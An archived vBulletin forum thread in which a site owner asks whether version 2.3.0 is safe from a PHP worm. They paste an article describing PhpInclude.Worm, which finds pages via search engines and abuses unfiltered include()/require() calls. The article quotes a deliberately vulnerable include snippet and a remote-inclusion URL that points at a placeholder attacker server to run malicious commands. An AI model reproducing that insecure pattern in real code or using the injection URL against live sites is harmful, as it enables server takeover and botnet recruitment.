The Arcive of Official vBulletin Modifications Site.It is not a VB3 engine, just a parsed copy! |
|
#1
|
|||
|
|||
PHP worm?
I was informed by my host there is a PHP worm out there...do you have an update or is Vbulltein alrwady secure for it? I run version 2.3.0
this is a copy of the email I got..any help would be appreicated. There is a worm using Google to look for insecure PHP pages. The worm will exploit the PHP pages and take over your site ranging from web site defacement to deletion of files. The problem relates to insecure PHP coding using the followng items: include() require() mail() upload --------- From the article: The new worm PhpInclude.Worm is currently propagated on Internet, it attacks any nonprotected dynamic page. [ This worm is detected by certain antivirus as being an alternative of Santy. We estimate that this worm is completely different from the Santy family, we thus decided to allot alias generic "the PhpInclude.Worm to him" ]. Contrary to Santy, PhpInclude.Worm does not exploit the vulnerabilities phpBB, it exploits a broader pallet of faults known as "of programming". It seeks (via Google/Yahoo/AOL) Web servers whose php pages use the functions "include()" and" require()"in a not-protected way. How? These functions are normally used by the programmers in order to include Web pages specified in arguments. Unfortunately, nonthe checking of these arguments can allow the inclusion and the execution of external files, and thus the compromising of the Web server: Example: vulnerable.php if(isset($page)) { include($page); } ----------------------------------------------- The page above correctly does not filter the variable $$page, it thus allows inclusion then the execution of distant arbitrary scripts: vulnerable.php?page=http://server_pirate/scriptmalicieux?cmd=commandes_malicieuses PhpInclude.Worm thus seeks pages of the type "* php?*=", then tries to insert various orders there allowing the installation of robots IRC and the constitution of an army of machines zombies. -- |
|
|
X vBulletin 3.8.12 by vBS Debug Information | |
---|---|
|
|
More Information | |
Template Usage:
Phrase Groups Available:
|
Included Files:
Hooks Called:
|